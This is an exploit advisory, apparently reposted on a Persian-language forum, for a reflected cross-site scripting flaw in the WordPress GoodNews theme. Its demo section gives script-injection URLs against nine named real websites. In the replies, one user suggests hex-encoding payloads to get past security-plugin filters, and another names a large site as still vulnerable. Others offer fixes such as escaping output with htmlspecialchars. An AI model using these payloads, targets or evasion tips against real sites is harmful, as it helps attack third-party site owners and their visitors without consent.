[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] Exploit Title: Wordpress Goodnews Themes Reflected Cross Site Scripting
[+]
[+] Exploit Author: FullSecurity.org
[+]
[+] Discovered By: Milad Hacking
[+]
[+] Vendor Homepage : http://www.momizat.net/
[+]
[+] Date: 2016-02-28
[+]
[+] Tested on: Kali Linux / lceweasel
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

[+] Demo :

http://albertsoler.com/?s=<script>alert('1')</script&gt;

http://www.altoriodoce.com/?s=<script>al.../script&gt;

http://www.araamesh.com/fa/?s=<script>al.../script&gt;

http://www.tele3.ro/?s=<script>alert('1')</script&gt;

http://bhportal.com.br/filmes/?s=<script.../script&gt;

http://holdupnow.com/?s=<script>alert('1')</script&gt;

http://tricountysentry.com/blog/?s=<scri.../script&gt;

http://www.reklamdergisi.com/?s=<script>.../script&gt;

http://www.animder.com/?s=?s=<script>ale.../script&gt;


Ya FaTeme Zahra

[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]

Special thanks to: iliya Norton - Milad Hacking - Mohamad Ghasemi
- irhblackhat - Distr0watch - N3TC4T - Ac!D - Mr.G}{o$t -
S4livan - MRS4JJ4D - SeCrEt_HaCkEr , Nazila Blackhat , Bl4ck_MohajeM , Xodiak , Ehsan Ice
Ehsan Hosseini (EhsanSec.ir)


[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]

Greetz to: My Lord Allah
https://telegram.me/thehacking
http://FullSecurity.org
milad.hacking.blackhat@Gmail.com
[+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+] [+]


https://cxsecurity.com/issue/WLB-2016020227

لطفا یه توضیح فارسی هم بفرمایید

ممنون بابت اطلاع رسانی ولی خب یعنی تا الان قالب GoodNews آپدیت رفع مشکل نداده؟
این مشکل فقط براحتی با یه تابع htmlspecialchars حل میشه.
البته اگه یکی از افزونه های امنیتی All in One WP Security یا iThemes Security رو نصب داشته باشید اصلاً نمیشه این لینک هایی که شما گفتید رو باز کرد و اخطار 403 میگیرید.من همین الان روی سایت خودم که افزونه All in One WP Security روش نصبه خواستم کوئری یکی از این لینک ها رو باز کنم که افزونه بهم اخطار 403 Forbidden داد.

البته اگه یکی از افزونه های امنیتی All in One WP Security یا iThemes Security رو نصب داشته باشید اصلاً نمیشه این لینک هایی که شما گفتید رو باز کرد و اخطار 403 میگیرید.من همین الان روی سایت خودم که افزونه All in One WP Security روش نصبه خواستم کوئری یکی از این لینک ها رو باز کنم که افزونه بهم اخطار 403 Forbidden داد.


درود این افزونه فقط میاد یه سری کاراکتر ها رو فیلتر میکنه که با کمی برسی و تحقیق میشه دورش زد

فکرش رو بکن به صورت hex و .. کد کنی و اجرا کنی رو سرور


ممنون بابت اطلاع رسانی ولی خب یعنی تا الان قالب GoodNews آپدیت رفع مشکل نداده؟


سایت هایی مثل دی جی کالا از نسخه 5 این پوسته استفاده میکنند ولی باز اسیب پذیر هستند.

سلام دوست عزیز 
من والا حوصله خوندن وترجمه متن رو نداشتم 
یعنی الاان یک قاب خاصی هست باگ داره یا کل وردپرس؟

(94-12-10، 01:52 عصر)omidg نوشته است: سلام دوست عزیز 
من والا حوصله خوندن وترجمه متن رو نداشتم 
یعنی الاان یک قاب خاصی هست باگ داره یا کل وردپرس؟

فقط قالب گود نیوز رو اشاره کردند. نه کل وردپرس.